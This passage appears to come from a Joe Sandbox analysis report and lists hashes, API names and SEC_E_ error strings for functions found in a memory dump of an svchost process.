                                                                • Opcode ID: fab2c605505c6a7b288d1ea27734c5cb1f34f6dc1052efb48d64a64469115f62
                                                                • Instruction ID: efefaa54e3f65aa8f2e707a17c1e2199d07d4b985e8462ad5b00c21dca553648
                                                                • Opcode Fuzzy Hash: fab2c605505c6a7b288d1ea27734c5cb1f34f6dc1052efb48d64a64469115f62
                                                                • Instruction Fuzzy Hash: 5F215A37704B4182E701EF21E4403A973B1E799F88F44C922DA9D6375ADF38D695E380

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$connect
                                                                • String ID: connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                                • API String ID: 375857812-3816509080
                                                                • Opcode ID: 9d4bbee65375004948dc6eb851de1c76ed46c69a0c6a21de92976749deb74100
                                                                • Instruction ID: 5c2e3984b6d0532dd2ef68f6a6a554e6392b1587107e00b8dc0cdd15f2018b60
                                                                • Opcode Fuzzy Hash: 9d4bbee65375004948dc6eb851de1c76ed46c69a0c6a21de92976749deb74100
                                                                • Instruction Fuzzy Hash: AE61C27A208A8485EB31DBA5D9543E9A7B0E346FE8F844222DE3D0F7D6EF64C645D340

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: CriticalErrorLastSection$Leavefreememmove$Enterfreeaddrinfogetaddrinfomallocsend
                                                                • String ID:
                                                                • API String ID: 3198214216-0
                                                                • Opcode ID: e069468138294b0d42a7d9e2d196727a2492f3a9547db1b3114be7453674423a
                                                                • Instruction ID: 4804da9c37bb533e7c8a0f99d418aa5dae05ea7fee58247d97e573d601d0fecf
                                                                • Opcode Fuzzy Hash: e069468138294b0d42a7d9e2d196727a2492f3a9547db1b3114be7453674423a
                                                                • Instruction Fuzzy Hash: 8F31B036208A5186E7608FA5E48438EB3B0F745FD8FC40211DA6D5BBA4EF78C685D740

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memmove$ErrorLastfreefreeaddrinfogetaddrinfomalloc
                                                                • String ID:
                                                                • API String ID: 420754818-0
                                                                • Opcode ID: 5690689acaa421e89e377b4d98ad99c46781c34d9c6ee45bdbc63379844944fc
                                                                • Instruction ID: bb3dea3f50e688641a8238cd4ccf5be4dd30661171b139a8df7ca735251ce4f7
                                                                • Opcode Fuzzy Hash: 5690689acaa421e89e377b4d98ad99c46781c34d9c6ee45bdbc63379844944fc
                                                                • Instruction Fuzzy Hash: 2B41803A20974486EA758F92E94079DF3B5F748FE0F884515DEAD43B94EB38D541D700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_BAD_BINDINGS
                                                                • API String ID: 3939687465-4193802906
                                                                • Opcode ID: 4ae39aaba354ca312d6457255954bcf7a71cb4e06a228ebbb92d9d27a1cbc1c8
                                                                • Instruction ID: 6c72d9c02ac4d5fecee26dde1bafb998139e616c39405294b3cbc953c649ceb9
                                                                • Opcode Fuzzy Hash: 4ae39aaba354ca312d6457255954bcf7a71cb4e06a228ebbb92d9d27a1cbc1c8
                                                                • Instruction Fuzzy Hash: 9E01407921864086F6729B91F4913E9A2B5B788FD4FC40015EA6F02795FF7CC745E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CANNOT_INSTALL
                                                                • API String ID: 3939687465-3689135316
                                                                • Opcode ID: 50d27433e9ce647bc4f9590cf387356ba4aeaa3a2d0b820b697123033eebe261
                                                                • Instruction ID: f0431370680a5aaf3b2268b5bf9c6fe62b875b47844aa51bbbab02c7002be73c
                                                                • Opcode Fuzzy Hash: 50d27433e9ce647bc4f9590cf387356ba4aeaa3a2d0b820b697123033eebe261
                                                                • Instruction Fuzzy Hash: 5701407921864086F672AB91F4913E9A2B5B788FD4FC40015EA6F02795FF7CC745E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_BUFFER_TOO_SMALL
                                                                • API String ID: 3939687465-3213503683
                                                                • Opcode ID: f0a99ce0059c141c48ec04eda93cf9f360708583881361bae81ebbd9556a3f0d
                                                                • Instruction ID: 2593f59a66efec5bd4ca8f8e91e7eb5858176a4f871b91e8cb4a2772f19b7763
                                                                • Opcode Fuzzy Hash: f0a99ce0059c141c48ec04eda93cf9f360708583881361bae81ebbd9556a3f0d
                                                                • Instruction Fuzzy Hash: 8601807921860086F6729B91F4913E9A2B0B788FC4FC40021EA6F02790FF3CC745E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_BAD_PKGID
                                                                • API String ID: 3939687465-428854770
                                                                • Opcode ID: e4821e884ca1c9353c5073079b8e784af184d8bf8c5e6d8cf8b8576c186c9ca4
                                                                • Instruction ID: d1281edeeb20b063d999ec9d0da5a8488e72b6198cfe80a67ed276659bee1549
                                                                • Opcode Fuzzy Hash: e4821e884ca1c9353c5073079b8e784af184d8bf8c5e6d8cf8b8576c186c9ca4
                                                                • Instruction Fuzzy Hash: 2001807921860086F6729B91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC746E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CERT_UNKNOWN
                                                                • API String ID: 3939687465-169894802
                                                                • Opcode ID: 18d95ea0c812e77af67839231a605aeb101d50a50e151c44ca4e4bce1f7a0bf6
                                                                • Instruction ID: da4fd882e077eeed66ebf23b1680b271c520a4a851249a4d276f11a2ed129865
                                                                • Opcode Fuzzy Hash: 18d95ea0c812e77af67839231a605aeb101d50a50e151c44ca4e4bce1f7a0bf6
                                                                • Instruction Fuzzy Hash: 2101807921860086F672AB91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CERT_EXPIRED
                                                                • API String ID: 3939687465-3192465694
                                                                • Opcode ID: 441da43cf9e542e5edd50b273512c7b9ea22a4b41436016054700c454272f4ae
                                                                • Instruction ID: b8f4a442d06b8adfe0e468b2b9c6fda2f66d912d8efcca41ed2a91fa1b1be88e
                                                                • Opcode Fuzzy Hash: 441da43cf9e542e5edd50b273512c7b9ea22a4b41436016054700c454272f4ae
                                                                • Instruction Fuzzy Hash: 950180B921860086F672AB91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CANNOT_PACK
                                                                • API String ID: 3939687465-1144097955
                                                                • Opcode ID: b67d73a2223d1d1db4298fc8e6e3aa8c67cbe50cf565ce810dca4f246a39bc46
                                                                • Instruction ID: 2406b4f5a65094335d91c785baee57382821561f027c3b48f48e899598711223
                                                                • Opcode Fuzzy Hash: b67d73a2223d1d1db4298fc8e6e3aa8c67cbe50cf565ce810dca4f246a39bc46
                                                                • Instruction Fuzzy Hash: 1501807921860086F6729B91F4913E9A2B0B788FC4FC40015EA6F02790FF3CC745E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CROSSREALM_DELEGATION_FAILURE
                                                                • API String ID: 3939687465-3852342135
                                                                • Opcode ID: 79225bff42c7f3756b2e0ba69c6c5bc578440328a4eb359beb1b3191571fa22f
                                                                • Instruction ID: d00f62771a89d95b96b3f07e4f52a7b1fe6e160cb8f5fe79a5c008eba2312042
                                                                • Opcode Fuzzy Hash: 79225bff42c7f3756b2e0ba69c6c5bc578440328a4eb359beb1b3191571fa22f
                                                                • Instruction Fuzzy Hash: 2301407921864086F672AB91F4913E9A2B5B788FD4FC40015EAAF02795FF7CC745E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CONTEXT_EXPIRED
                                                                • API String ID: 3939687465-1358876214
                                                                • Opcode ID: 61983125f33651b5802577ff577e31b0029aa78b3f8dc3bb7d7398845e948f08
                                                                • Instruction ID: b377b2b5385d94712b1edc3b36b181573217c439c9bc386081dd711bec578826
                                                                • Opcode Fuzzy Hash: 61983125f33651b5802577ff577e31b0029aa78b3f8dc3bb7d7398845e948f08
                                                                • Instruction Fuzzy Hash: AF01807921860086F6729B91F4913E9E2B0B788FC4FC40011EA6F02790FF3CC746E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CERT_WRONG_USAGE
                                                                • API String ID: 3939687465-3896346274
                                                                • Opcode ID: c523917cea4f88baa68328a1d349acba4bc64ba1872f12e598f7fb40ba3a4714
                                                                • Instruction ID: 6dc2b074fde1316518089e14a25c6d02af22b35db7f2ec7b3521cd6f9ecfe8d7
                                                                • Opcode Fuzzy Hash: c523917cea4f88baa68328a1d349acba4bc64ba1872f12e598f7fb40ba3a4714
                                                                • Instruction Fuzzy Hash: C501407921864086F672AB91F4913E9A2B5B788FD4FC40015EA6F02795FF7CC745E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_DELEGATION_POLICY
                                                                • API String ID: 3939687465-829877842
                                                                • Opcode ID: d4d8b91f72fff87b202198528f23fdc910b22ffa6555036cbe69808ad8010e3e
                                                                • Instruction ID: 9a64bdb70ef382e60c95ec6bdcc88c84315f6d9e5a92aaf4edcc90abfdf568d9
                                                                • Opcode Fuzzy Hash: d4d8b91f72fff87b202198528f23fdc910b22ffa6555036cbe69808ad8010e3e
                                                                • Instruction Fuzzy Hash: BE01807921860086F6729B91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_DECRYPT_FAILURE
                                                                • API String ID: 3939687465-1043736155
                                                                • Opcode ID: 2c35cf236970ab930637a02230fddc1cfffb66284058033d907bb0a4ca484230
                                                                • Instruction ID: 729945cb5066fc09eb3058a3a4be2ed4c1aaa70ab93f0c7d5d1ef618d06030dd
                                                                • Opcode Fuzzy Hash: 2c35cf236970ab930637a02230fddc1cfffb66284058033d907bb0a4ca484230
                                                                • Instruction Fuzzy Hash: 5801807921860086F6729B91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC746E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CRYPTO_SYSTEM_INVALID
                                                                • API String ID: 3939687465-3331766186
                                                                • Opcode ID: b1bae386a3d65ff28abd1242a99fe727f19cf3943ac4257ccb029480fa423dac
                                                                • Instruction ID: 7ab0ca41704e1442dce530cf602dc06fb17bf207d671391d0d8a061091dc4c39
                                                                • Opcode Fuzzy Hash: b1bae386a3d65ff28abd1242a99fe727f19cf3943ac4257ccb029480fa423dac
                                                                • Instruction Fuzzy Hash: 6B01807921860086F6729B91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_DOWNGRADE_DETECTED
                                                                • API String ID: 3939687465-1814928707
                                                                • Opcode ID: e40e7ce7aaa022eaac0eb0474ca994afa18f010793b8621ccf14ea6f630dde15
                                                                • Instruction ID: aa69e2a897e0ec1275fd391b13d7c54a7c65fb90ea16bbd5da6b13a2b338dfd3
                                                                • Opcode Fuzzy Hash: e40e7ce7aaa022eaac0eb0474ca994afa18f010793b8621ccf14ea6f630dde15
                                                                • Instruction Fuzzy Hash: A501807921864086F6729B91F4913EAE2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_DELEGATION_REQUIRED
                                                                • API String ID: 3939687465-3988574617
                                                                • Opcode ID: 3a3bde5c9ab0fb7f7e326860c92128801c8b0d75ec7503537036e7543c7320be
                                                                • Instruction ID: f42acf84497becbbcbdb4375ee98e2c1ed2cc36fb060a90a61f68d26beee1542
                                                                • Opcode Fuzzy Hash: 3a3bde5c9ab0fb7f7e326860c92128801c8b0d75ec7503537036e7543c7320be
                                                                • Instruction Fuzzy Hash: 7601807921860086F6729B91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_INCOMPLETE_CREDENTIALS
                                                                • API String ID: 3939687465-1320471878
                                                                • Opcode ID: 03152994c3950484c5c98b6f09b6cf5e3df2be0ebc9ea3828cb78d72b3857db1
                                                                • Instruction ID: f323c9d00cfdd915154e38847c330cf580a619b78118cc2c7b8d03f0b626ef3d
                                                                • Opcode Fuzzy Hash: 03152994c3950484c5c98b6f09b6cf5e3df2be0ebc9ea3828cb78d72b3857db1
                                                                • Instruction Fuzzy Hash: 4E01807921864086F6729B91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_ENCRYPT_FAILURE
                                                                • API String ID: 3939687465-3371550302
                                                                • Opcode ID: c95089c4754a777f2387e5c161045ba63b7e950e5af8988961487714c573afcb
                                                                • Instruction ID: f861c207d5825f972bc65dc37c45148fd4e7bb34ba7c13a3b085c281d1a8ca81
                                                                • Opcode Fuzzy Hash: c95089c4754a777f2387e5c161045ba63b7e950e5af8988961487714c573afcb
                                                                • Instruction Fuzzy Hash: BB01807921860086F672AB91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_ALGORITHM_MISMATCH
                                                                • API String ID: 3939687465-3091687665
                                                                • Opcode ID: 25c386bd488f808c3cfea18c7eaafe3f10b4d0589020745c7e9fd4b935c226b7
                                                                • Instruction ID: f3cf564578426ad5b4f95b97ae8c93a4ab4b71a5f3c0b96c20f94d4a135507f4
                                                                • Opcode Fuzzy Hash: 25c386bd488f808c3cfea18c7eaafe3f10b4d0589020745c7e9fd4b935c226b7
                                                                • Instruction Fuzzy Hash: E101407921860086E6729F91F4913EAA2B5B788FD4FC40015EA6F02795FF7CC745E610
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
